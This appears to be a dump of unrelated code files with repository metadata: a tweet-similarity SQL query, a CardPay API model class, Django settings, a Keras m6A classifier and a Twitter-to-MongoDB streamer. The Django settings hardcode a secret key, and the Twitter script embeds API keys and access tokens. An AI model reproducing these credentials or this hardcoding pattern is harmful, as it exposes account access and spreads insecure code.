(tweet_gap.gap_638 * user_surfacing_tweet_vectors.gap_638) +
(tweet_gap.gap_639 * user_surfacing_tweet_vectors.gap_639) +
(tweet_gap.gap_640 * user_surfacing_tweet_vectors.gap_640) +
(tweet_gap.gap_641 * user_surfacing_tweet_vectors.gap_641) +
(tweet_gap.gap_642 * user_surfacing_tweet_vectors.gap_642) +
(tweet_gap.gap_643 * user_surfacing_tweet_vectors.gap_643) +
(tweet_gap.gap_644 * user_surfacing_tweet_vectors.gap_644) +
(tweet_gap.gap_645 * user_surfacing_tweet_vectors.gap_645) +
(tweet_gap.gap_646 * user_surfacing_tweet_vectors.gap_646) +
(tweet_gap.gap_647 * user_surfacing_tweet_vectors.gap_647) +
(tweet_gap.gap_648 * user_surfacing_tweet_vectors.gap_648) +
(tweet_gap.gap_649 * user_surfacing_tweet_vectors.gap_649) +
(tweet_gap.gap_650 * user_surfacing_tweet_vectors.gap_650) +
(tweet_gap.gap_651 * user_surfacing_tweet_vectors.gap_651) +
(tweet_gap.gap_652 * user_surfacing_tweet_vectors.gap_652) +
(tweet_gap.gap_653 * user_surfacing_tweet_vectors.gap_653) +
(tweet_gap.gap_654 * user_surfacing_tweet_vectors.gap_654) +
(tweet_gap.gap_655 * user_surfacing_tweet_vectors.gap_655) +
(tweet_gap.gap_656 * user_surfacing_tweet_vectors.gap_656) +
(tweet_gap.gap_657 * user_surfacing_tweet_vectors.gap_657) +
(tweet_gap.gap_658 * user_surfacing_tweet_vectors.gap_658) +
(tweet_gap.gap_659 * user_surfacing_tweet_vectors.gap_659) +
(tweet_gap.gap_660 * user_surfacing_tweet_vectors.gap_660) +
(tweet_gap.gap_661 * user_surfacing_tweet_vectors.gap_661) +
(tweet_gap.gap_662 * user_surfacing_tweet_vectors.gap_662) +
(tweet_gap.gap_663 * user_surfacing_tweet_vectors.gap_663) +
(tweet_gap.gap_664 * user_surfacing_tweet_vectors.gap_664) +
(tweet_gap.gap_665 * user_surfacing_tweet_vectors.gap_665) +
(tweet_gap.gap_666 * user_surfacing_tweet_vectors.gap_666) +
(tweet_gap.gap_667 * user_surfacing_tweet_vectors.gap_667) +
(tweet_gap.gap_668 * user_surfacing_tweet_vectors.gap_668) +
(tweet_gap.gap_669 * user_surfacing_tweet_vectors.gap_669) +
(tweet_gap.gap_670 * user_surfacing_tweet_vectors.gap_670) +
(tweet_gap.gap_671 * user_surfacing_tweet_vectors.gap_671) +
(tweet_gap.gap_672 * user_surfacing_tweet_vectors.gap_672) +
(tweet_gap.gap_673 * user_surfacing_tweet_vectors.gap_673) +
(tweet_gap.gap_674 * user_surfacing_tweet_vectors.gap_674) +
(tweet_gap.gap_675 * user_surfacing_tweet_vectors.gap_675) +
(tweet_gap.gap_676 * user_surfacing_tweet_vectors.gap_676) +
(tweet_gap.gap_677 * user_surfacing_tweet_vectors.gap_677) +
(tweet_gap.gap_678 * user_surfacing_tweet_vectors.gap_678) +
(tweet_gap.gap_679 * user_surfacing_tweet_vectors.gap_679) +
(tweet_gap.gap_680 * user_surfacing_tweet_vectors.gap_680) +
(tweet_gap.gap_681 * user_surfacing_tweet_vectors.gap_681) +
(tweet_gap.gap_682 * user_surfacing_tweet_vectors.gap_682) +
(tweet_gap.gap_683 * user_surfacing_tweet_vectors.gap_683) +
(tweet_gap.gap_684 * user_surfacing_tweet_vectors.gap_684) +
(tweet_gap.gap_685 * user_surfacing_tweet_vectors.gap_685) +
(tweet_gap.gap_686 * user_surfacing_tweet_vectors.gap_686) +
(tweet_gap.gap_687 * user_surfacing_tweet_vectors.gap_687) +
(tweet_gap.gap_688 * user_surfacing_tweet_vectors.gap_688) +
(tweet_gap.gap_689 * user_surfacing_tweet_vectors.gap_689) +
(tweet_gap.gap_690 * user_surfacing_tweet_vectors.gap_690) +
(tweet_gap.gap_691 * user_surfacing_tweet_vectors.gap_691) +
(tweet_gap.gap_692 * user_surfacing_tweet_vectors.gap_692) +
(tweet_gap.gap_693 * user_surfacing_tweet_vectors.gap_693) +
(tweet_gap.gap_694 * user_surfacing_tweet_vectors.gap_694) +
(tweet_gap.gap_695 * user_surfacing_tweet_vectors.gap_695) +
(tweet_gap.gap_696 * user_surfacing_tweet_vectors.gap_696) +
(tweet_gap.gap_697 * user_surfacing_tweet_vectors.gap_697) +
(tweet_gap.gap_698 * user_surfacing_tweet_vectors.gap_698) +
(tweet_gap.gap_699 * user_surfacing_tweet_vectors.gap_699) +
(tweet_gap.gap_700 * user_surfacing_tweet_vectors.gap_700) +
(tweet_gap.gap_701 * user_surfacing_tweet_vectors.gap_701) +
(tweet_gap.gap_702 * user_surfacing_tweet_vectors.gap_702) +
(tweet_gap.gap_703 * user_surfacing_tweet_vectors.gap_703) +
(tweet_gap.gap_704 * user_surfacing_tweet_vectors.gap_704) +
(tweet_gap.gap_705 * user_surfacing_tweet_vectors.gap_705) +
(tweet_gap.gap_706 * user_surfacing_tweet_vectors.gap_706) +
(tweet_gap.gap_707 * user_surfacing_tweet_vectors.gap_707) +
(tweet_gap.gap_708 * user_surfacing_tweet_vectors.gap_708) +
(tweet_gap.gap_709 * user_surfacing_tweet_vectors.gap_709) +
(tweet_gap.gap_710 * user_surfacing_tweet_vectors.gap_710) +
(tweet_gap.gap_711 * user_surfacing_tweet_vectors.gap_711) +
(tweet_gap.gap_712 * user_surfacing_tweet_vectors.gap_712) +
(tweet_gap.gap_713 * user_surfacing_tweet_vectors.gap_713) +
(tweet_gap.gap_714 * user_surfacing_tweet_vectors.gap_714) +
(tweet_gap.gap_715 * user_surfacing_tweet_vectors.gap_715) +
(tweet_gap.gap_716 * user_surfacing_tweet_vectors.gap_716) +
(tweet_gap.gap_717 * user_surfacing_tweet_vectors.gap_717) +
(tweet_gap.gap_718 * user_surfacing_tweet_vectors.gap_718) +
(tweet_gap.gap_719 * user_surfacing_tweet_vectors.gap_719) +
(tweet_gap.gap_720 * user_surfacing_tweet_vectors.gap_720) +
(tweet_gap.gap_721 * user_surfacing_tweet_vectors.gap_721) +
(tweet_gap.gap_722 * user_surfacing_tweet_vectors.gap_722) +
(tweet_gap.gap_723 * user_surfacing_tweet_vectors.gap_723) +
(tweet_gap.gap_724 * user_surfacing_tweet_vectors.gap_724) +
(tweet_gap.gap_725 * user_surfacing_tweet_vectors.gap_725) +
(tweet_gap.gap_726 * user_surfacing_tweet_vectors.gap_726) +
(tweet_gap.gap_727 * user_surfacing_tweet_vectors.gap_727) +
(tweet_gap.gap_728 * user_surfacing_tweet_vectors.gap_728) +
(tweet_gap.gap_729 * user_surfacing_tweet_vectors.gap_729) +
(tweet_gap.gap_730 * user_surfacing_tweet_vectors.gap_730) +
(tweet_gap.gap_731 * user_surfacing_tweet_vectors.gap_731) +
(tweet_gap.gap_732 * user_surfacing_tweet_vectors.gap_732) +
(tweet_gap.gap_733 * user_surfacing_tweet_vectors.gap_733) +
(tweet_gap.gap_734 * user_surfacing_tweet_vectors.gap_734) +
(tweet_gap.gap_735 * user_surfacing_tweet_vectors.gap_735) +
(tweet_gap.gap_736 * user_surfacing_tweet_vectors.gap_736) +
(tweet_gap.gap_737 * user_surfacing_tweet_vectors.gap_737) +
(tweet_gap.gap_738 * user_surfacing_tweet_vectors.gap_738) +
(tweet_gap.gap_739 * user_surfacing_tweet_vectors.gap_739) +
(tweet_gap.gap_740 * user_surfacing_tweet_vectors.gap_740) +
(tweet_gap.gap_741 * user_surfacing_tweet_vectors.gap_741) +
(tweet_gap.gap_742 * user_surfacing_tweet_vectors.gap_742) +
(tweet_gap.gap_743 * user_surfacing_tweet_vectors.gap_743) +
(tweet_gap.gap_744 * user_surfacing_tweet_vectors.gap_744) +
(tweet_gap.gap_745 * user_surfacing_tweet_vectors.gap_745) +
(tweet_gap.gap_746 * user_surfacing_tweet_vectors.gap_746) +
(tweet_gap.gap_747 * user_surfacing_tweet_vectors.gap_747) +
(tweet_gap.gap_748 * user_surfacing_tweet_vectors.gap_748) +
(tweet_gap.gap_749 * user_surfacing_tweet_vectors.gap_749) +
(tweet_gap.gap_750 * user_surfacing_tweet_vectors.gap_750) +
(tweet_gap.gap_751 * user_surfacing_tweet_vectors.gap_751) +
(tweet_gap.gap_752 * user_surfacing_tweet_vectors.gap_752) +
(tweet_gap.gap_753 * user_surfacing_tweet_vectors.gap_753) +
(tweet_gap.gap_754 * user_surfacing_tweet_vectors.gap_754) +
(tweet_gap.gap_755 * user_surfacing_tweet_vectors.gap_755) +
(tweet_gap.gap_756 * user_surfacing_tweet_vectors.gap_756) +
(tweet_gap.gap_757 * user_surfacing_tweet_vectors.gap_757) +
(tweet_gap.gap_758 * user_surfacing_tweet_vectors.gap_758) +
(tweet_gap.gap_759 * user_surfacing_tweet_vectors.gap_759) +
(tweet_gap.gap_760 * user_surfacing_tweet_vectors.gap_760) +
(tweet_gap.gap_761 * user_surfacing_tweet_vectors.gap_761) +
(tweet_gap.gap_762 * user_surfacing_tweet_vectors.gap_762) +
(tweet_gap.gap_763 * user_surfacing_tweet_vectors.gap_763) +
(tweet_gap.gap_764 * user_surfacing_tweet_vectors.gap_764) +
(tweet_gap.gap_765 * user_surfacing_tweet_vectors.gap_765) +
(tweet_gap.gap_766 * user_surfacing_tweet_vectors.gap_766) +
(tweet_gap.gap_767 * user_surfacing_tweet_vectors.gap_767)
) as dot_product_of_engaged_tweet_and_engaging_user_surfacing_tweets
from {table_name} t
left join `recsys2020.pretrained_bert_gap` tweet_gap on t.tweet_id = tweet_gap.tweet_id
left join user_surfacing_tweet_vectors on t.engaging_user_id = user_surfacing_tweet_vectors.user_id
order by t.tweet_id, t.engaging_user_id
"""
if __name__ == "__main__":
BertSimilarityBetweenTweetAndEngagingSurfacingTweetVectorsFeature.main()
| [
"agatan039@gmail.com"
] | agatan039@gmail.com |
1cdbe0eee6a24955bbe72e9528b58437571dd39b | af0b56556b747233d9085eb51991806017e2a5eb | /cardpay/model/payment_response_customer.py | ba914e59a971e9191cee9c6f161144ad9508c0f5 | [
"MIT"
] | permissive | whereisthebabki/python-sdk-v3 | ab39809f911e80873550c44156882c8680cb6e96 | b756cd0761fc23cb095db4801baee53c00de9241 | refs/heads/master | 2020-06-22T01:02:44.377584 | 2019-07-18T13:30:26 | 2019-07-18T13:30:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,414 | py | # coding: utf-8
"""
CardPay REST API
Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a REST resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on OAuth 2.0 standard. For recent changes see changelog section. # noqa: E501
OpenAPI spec version: 3.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PaymentResponseCustomer(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'email': 'str',
'full_name': 'str',
'id': 'str',
'ip': 'str',
'locale': 'str',
'phone': 'str'
}
attribute_map = {
'email': 'email',
'full_name': 'full_name',
'id': 'id',
'ip': 'ip',
'locale': 'locale',
'phone': 'phone'
}
def __init__(self, email=None, full_name=None, id=None, ip=None, locale=None, phone=None): # noqa: E501
"""PaymentResponseCustomer - a model defined in Swagger""" # noqa: E501
self._email = None
self._full_name = None
self._id = None
self._ip = None
self._locale = None
self._phone = None
self.discriminator = None
if email is not None:
self.email = email
if full_name is not None:
self.full_name = full_name
if id is not None:
self.id = id
if ip is not None:
self.ip = ip
if locale is not None:
self.locale = locale
if phone is not None:
self.phone = phone
@property
def email(self):
"""Gets the email of this PaymentResponseCustomer. # noqa: E501
Email address of the customer (mandatory by default for 'Asia’, 'Latin America’, 'NETELLER', 'DIRECTBANKINGNGA', 'AQRCODE', 'AIRTEL', 'MPESA', 'MTN', 'UGANDAMOBILE', 'VODAFONE', 'TIGO' payment methods only)). Can be defined as optional by CardPay manager. # noqa: E501
:return: The email of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this PaymentResponseCustomer.
Email address of the customer (mandatory by default for 'Asia’, 'Latin America’, 'NETELLER', 'DIRECTBANKINGNGA', 'AQRCODE', 'AIRTEL', 'MPESA', 'MTN', 'UGANDAMOBILE', 'VODAFONE', 'TIGO' payment methods only)). Can be defined as optional by CardPay manager. # noqa: E501
:param email: The email of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
if email is not None and len(email) > 256:
raise ValueError("Invalid value for `email`, length must be less than or equal to `256`") # noqa: E501
if email is not None and len(email) < 1:
raise ValueError("Invalid value for `email`, length must be greater than or equal to `1`") # noqa: E501
self._email = email
@property
def full_name(self):
"""Gets the full_name of this PaymentResponseCustomer. # noqa: E501
Customer's full name (mandatory for 'Asia’ payment method only) # noqa: E501
:return: The full_name of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._full_name
@full_name.setter
def full_name(self, full_name):
"""Sets the full_name of this PaymentResponseCustomer.
Customer's full name (mandatory for 'Asia’ payment method only) # noqa: E501
:param full_name: The full_name of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
if full_name is not None and len(full_name) > 255:
raise ValueError("Invalid value for `full_name`, length must be less than or equal to `255`") # noqa: E501
if full_name is not None and len(full_name) < 1:
raise ValueError("Invalid value for `full_name`, length must be greater than or equal to `1`") # noqa: E501
self._full_name = full_name
@property
def id(self):
"""Gets the id of this PaymentResponseCustomer. # noqa: E501
Customer's ID in the merchant's system # noqa: E501
:return: The id of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this PaymentResponseCustomer.
Customer's ID in the merchant's system # noqa: E501
:param id: The id of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
if id is not None and len(id) > 256:
raise ValueError("Invalid value for `id`, length must be less than or equal to `256`") # noqa: E501
if id is not None and len(id) < 0:
raise ValueError("Invalid value for `id`, length must be greater than or equal to `0`") # noqa: E501
self._id = id
@property
def ip(self):
"""Gets the ip of this PaymentResponseCustomer. # noqa: E501
IP address of customer, present if wallet (terminal) settings has this option enabled. By default the option is not enabled # noqa: E501
:return: The ip of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._ip
@ip.setter
def ip(self, ip):
"""Sets the ip of this PaymentResponseCustomer.
IP address of customer, present if wallet (terminal) settings has this option enabled. By default the option is not enabled # noqa: E501
:param ip: The ip of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
if ip is not None and len(ip) > 15:
raise ValueError("Invalid value for `ip`, length must be less than or equal to `15`") # noqa: E501
if ip is not None and len(ip) < 1:
raise ValueError("Invalid value for `ip`, length must be greater than or equal to `1`") # noqa: E501
self._ip = ip
@property
def locale(self):
"""Gets the locale of this PaymentResponseCustomer. # noqa: E501
Preferred locale for the payment page ([ISO 639-1](https://en.wikipedia.org/wiki/ISO_639-1) language code). The default locale will be applied if the selected locale is not supported. Supported locales are: `ru`, `en`, `zh`, `ja` # noqa: E501
:return: The locale of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._locale
@locale.setter
def locale(self, locale):
"""Sets the locale of this PaymentResponseCustomer.
Preferred locale for the payment page ([ISO 639-1](https://en.wikipedia.org/wiki/ISO_639-1) language code). The default locale will be applied if the selected locale is not supported. Supported locales are: `ru`, `en`, `zh`, `ja` # noqa: E501
:param locale: The locale of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
self._locale = locale
@property
def phone(self):
"""Gets the phone of this PaymentResponseCustomer. # noqa: E501
Customer's phone number. Mandatory for 'Asia’ and DIRECTBANKINGNGA payment methods. For other payment methods: optional by default, can be defined as mandatory by CardPay manager. # noqa: E501
:return: The phone of this PaymentResponseCustomer. # noqa: E501
:rtype: str
"""
return self._phone
@phone.setter
def phone(self, phone):
"""Sets the phone of this PaymentResponseCustomer.
Customer's phone number. Mandatory for 'Asia’ and DIRECTBANKINGNGA payment methods. For other payment methods: optional by default, can be defined as mandatory by CardPay manager. # noqa: E501
:param phone: The phone of this PaymentResponseCustomer. # noqa: E501
:type: str
"""
if phone is not None and len(phone) > 13:
raise ValueError("Invalid value for `phone`, length must be less than or equal to `13`") # noqa: E501
if phone is not None and len(phone) < 10:
raise ValueError("Invalid value for `phone`, length must be greater than or equal to `10`") # noqa: E501
self._phone = phone
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if value is not None:
result[attr] = value
if issubclass(PaymentResponseCustomer, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PaymentResponseCustomer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"rnd@cardpay.com"
] | rnd@cardpay.com |
3e5a3a1740c2c325383ba062154ff72b2ae80803 | c64f42286006cb0990cf002b07170b7b34773d6b | /ProTow/ProTow/settings.py | 42b6b83f3988641676084abcfa4f687b7de7d899 | [] | no_license | tlawren3/djangoclass | 5c489d0240021e22f2545ee85a374f82d818e657 | 65df31ccbc6e17ca14eb2697bda573c17aeaaac8 | refs/heads/master | 2020-04-08T21:13:21.087924 | 2018-11-29T22:26:34 | 2018-11-29T22:26:34 | 159,735,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,101 | py | """
Django settings for ProTow project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(#lnuan)ormzi%%+-9p!k@^f0^8-5*7@9le7gmz)bnvoj#^4p8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'AppTwo'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ProTow.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ProTow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"tlawren3@icloud.com"
] | tlawren3@icloud.com |
2933d2996ff2c284d1fd6b90cd4dfcbf24fdc883 | 8953c8dce654ae32a80adf873376ea5566daead7 | /eif3a_full_m6aReader.py | 5854751b65e91f4e21efdba142d57127f35c3467 | [] | no_license | yuxuanwu17/m6a_dp | 5e17e86b2ea2133e69beec0eab8abc7877d90276 | f3a5966f9abcce7077839024a71f01a139689967 | refs/heads/master | 2022-11-20T15:06:34.470254 | 2020-07-21T14:27:15 | 2020-07-21T14:27:15 | 280,642,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,201 | py | #%%
# To pkeras_model=None training, we import the necessary functions and submodules from keras
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dropout, Reshape, Dense, Activation, Flatten
from keras.layers.convolutional import Conv1D, MaxPooling1D
from keras.optimizers import Adadelta, SGD, RMSprop;
import keras.losses;
from keras.constraints import maxnorm;
from keras.utils import normalize, to_categorical
from keras.layers.normalization import BatchNormalization
from keras import regularizers
from keras.callbacks import EarlyStopping, History, ModelCheckpoint
from keras import backend as K
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, precision_recall_curve, auc
from pandas import DataFrame
#%%
def load_data():
df = pd.read_csv("eif3a_full_test_m6aReader.csv")
# print(df)
n = len(df.columns)
train = int(n / 2)
x_train = df.iloc[:, 2:train]
x_test = df.iloc[:, (train + 1):(n - 1)]
x_test = DataFrame(x_test)
x_test = x_test.dropna()
# print(x_test)
x_train = np.expand_dims(x_train, axis=1)
x_test = np.expand_dims(x_test, axis=1)
y_train = np.array([1, 0])
y_train = y_train.repeat(int((df.shape[0]) / 2))
y_train = np.mat(y_train).transpose()
y_test = np.array([1, 0])
y_test = y_test.repeat(int((x_test.shape[0] / 2)))
y_test = np.mat(y_test).transpose()
# print(x_test.shape)
# print(x_train.shape)
# print(y_test.shape)
# print(y_train.shape)
return x_train, x_test, y_test, y_train
def precision(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + K.epsilon())
return precision
def recall(y_true, y_pred):
true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + K.epsilon())
return recall
#%%
def build_model(x_train):
one_filter_keras_model = Sequential()
one_filter_keras_model.add(
Conv1D(filters=90, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01),
input_shape=x_train.shape[1::]))
one_filter_keras_model.add(Activation('relu'))
one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
one_filter_keras_model.add(Dropout(0.25))
one_filter_keras_model.add(
Conv1D(filters=100, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01)))
one_filter_keras_model.add(Activation('relu'))
one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
one_filter_keras_model.add(Dropout(0.25))
one_filter_keras_model.add(Flatten())
one_filter_keras_model.add(Dense(1210))
one_filter_keras_model.add(Activation("relu"))
one_filter_keras_model.add(Dense(1))
one_filter_keras_model.add(Activation("sigmoid"))
one_filter_keras_model.summary()
one_filter_keras_model.compile(loss='binary_crossentropy', optimizer='adam',
metrics=['accuracy', precision, recall])
return one_filter_keras_model
#%%
def compileModel(model, x_train, x_test, y_test, y_train):
model = model
x_train = x_train
x_test = x_test
y_test = y_test
y_train = y_train
earlystop = EarlyStopping(monitor='val_loss',
min_delta=0,
patience=10,
verbose=1)
filepath = "weights.best.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint, earlystop]
epoch = 100
batchsize = 128
history = model.fit(x_train, y_train, batch_size=batchsize, epochs=epoch,
validation_data=(x_test, y_test),
callbacks=callbacks_list)
return history
# ################################
# print('draw the loss plot')
# ###############################
def lossplot(history):
ori_val_Loss = history.history['val_loss']
loss = history.history['loss']
epochs = np.arange(len(history.epoch)) + 1
plt.plot(epochs, ori_val_Loss, label='val loss')
plt.plot(epochs, loss, label='loss')
plt.title("Effect of model capacity on validation loss\n")
plt.xlabel('Epoch #')
plt.ylabel('Validation Loss')
plt.legend()
# plt.show()
plt.savefig('/home/yuxuan/dp/m6aReader/loss_m6areader.png')
print("")
print("The loss plot is saved \n")
def roc(model, x_test, y_test):
print('Start drawing the roc curve \n')
from sklearn.metrics import roc_curve
from sklearn.metrics import auc
y_pred_keras = model.predict(x_test).ravel()
fpr_keras, tpr_keras, thresholds_keras = roc_curve(y_test, y_pred_keras)
auc_keras = auc(fpr_keras, tpr_keras)
plt.cla()
plt.figure(1)
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_keras, tpr_keras, label='AUROC (area = {:.3f})'.format(auc_keras))
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve')
plt.legend(loc='best')
# plt.show()
print('AUROC (area = {:.3f})'.format(auc_keras))
plt.savefig('/home/yuxuan/dp/m6aReader/ROC_m6areader.png')
return auc_keras
def prcurve(model, x_test, y_test):
lr_probs = model.predict_proba(x_test)
lr_precision, lr_recall, _ = precision_recall_curve(y_test, lr_probs)
lr_auc = auc(lr_recall, lr_precision)
# summarize scores
print('PRAUC: auc=%.3f' % (lr_auc))
# plot the precision-recall curves
no_skill = len(y_test[y_test == 1]) / len(y_test)
pyplot.cla()
pyplot.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')
pyplot.plot(lr_recall, lr_precision, marker='.', label='Logistic')
# axis labels
pyplot.xlabel('Recall')
pyplot.ylabel('Precision')
# show the legend
pyplot.legend()
# show the plot
# pyplot.show()
plt.savefig('/home/yuxuan/dp/m6aReader/PRAUC_m6areader.png')
return lr_auc
def MCC(model,x_test,y_test):
from sklearn.metrics import matthews_corrcoef
yhat = model.predict_classes(x_test)
mcc = matthews_corrcoef(y_test, yhat)
print('MCC = {:.3f}'.format(mcc))
return mcc
def ACC(model,x_test,y_test):
from sklearn.metrics import accuracy_score
yhat = model.predict_classes(x_test)
acc = accuracy_score(y_test, yhat)
print('ACC = {:.3f}'.format(acc))
return acc
def main():
x_train, x_test, y_test, y_train = load_data()
model = build_model(x_train)
history = compileModel(model, x_train, x_test, y_test, y_train)
lossplot(history)
auc = roc(model, x_test, y_test)
prauc =prcurve(model, x_test, y_test)
mcc =MCC(model,x_test,y_test)
acc = ACC(model,x_test,y_test)
results = np.array([auc,prauc,mcc,acc])
np.savetxt('/home/yuxuan/dp/m6aReader/eif3a_full_m6aReader.csv', results, delimiter=',')
if __name__ == '__main__':
main()
| [
"yuxuan.wu17@gmail.com"
] | yuxuan.wu17@gmail.com |
c2fd4c3fec6f8deacabcdb8e6a1f219e8f2805bd | a20f21f0737002e3fb3e8345c42f2f46aaefab7d | /Weather Report/TwitterToMongo.py | 558b800e0079be39bccb42359abeb41838cac9c4 | [] | no_license | akokaz1/PMG | 22a5c2dad1d38de013f73b314365e01890aeddff | a9db139d728765ef6c03140eba2f2c6861b37e91 | refs/heads/master | 2021-01-20T07:57:00.178171 | 2016-12-02T14:46:46 | 2016-12-02T14:46:46 | 68,720,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | from twython import TwythonStreamer
from pymongo import MongoClient
client = MongoClient()
db = client.twitter
tweets = db.twitterdata
tweeter = []
class MyStreamer(TwythonStreamer):
def on_success(self, data):
if data ['lang'] == 'en':
tweeter.append(data)
tweets.insert(data)
print 'recieved tweet #', len(tweeter)
if len(tweeter)>= 3000:
self.disconnect()
def on_error(self,status_code, data):
print status_code, data
self.disconnect()
stream = MyStreamer('eAL497dT5hjs2bHLh1mRoR3cj', 'HUuqoidPWbT04QPpZfFHwpqvLvq6IxOU1kOa2eRRZf8Rh5XmtE',
'775365291555651584-hhpeCLC8VY2ccOoeWxXge6cWbamKhBG',
'zzlkNqY4eaxCZ738GXhcTPmQf2L9RkO6uZot93a2ZJoF7')
stream.statuses.filter(track='london avalanche\
,london balmy\
,london black ice\
,london blizzard\
,london blustery\
,london breeze\
,london cloud\
,london cloudy\
,london cold\
,london condensation\
,london dew\
,london downburst\
,london downpour\
,london drizzle\
,london drought\
,london dry\
,london flood\
,london fog\
,london forecast\
,london freeze\
,london freezing\
,london frost\
,london gale\
,london gust\
,london gustnado\
,london hail\
,london haze\
,london heat\
,london heatwave\
,london humid\
,london humidity\
,london hurricane\
,london ice\
,london icicle\
,london lightning\
,london mist\
,london muggy\
,london overcast\
,london permafrost\
,london rain\
,london rainbands\
,london rainbow\
,london sandstorm\
,london sleet\
,london slush\
,london smog\
,london snow\
,london snowstorm\
,london storm\
,london summer\
,london sunrise\
,london sunset\
,london temperature\
,london thaw\
,london thunder\
,london thunderstorm\
,london tropical\
,london visibility\
,london warm\
,london weather\
,london wind\
,london winter')
#tweets.insert_many(tweeter)
| [
"alikokaz@live.co.uk"
] | alikokaz@live.co.uk |
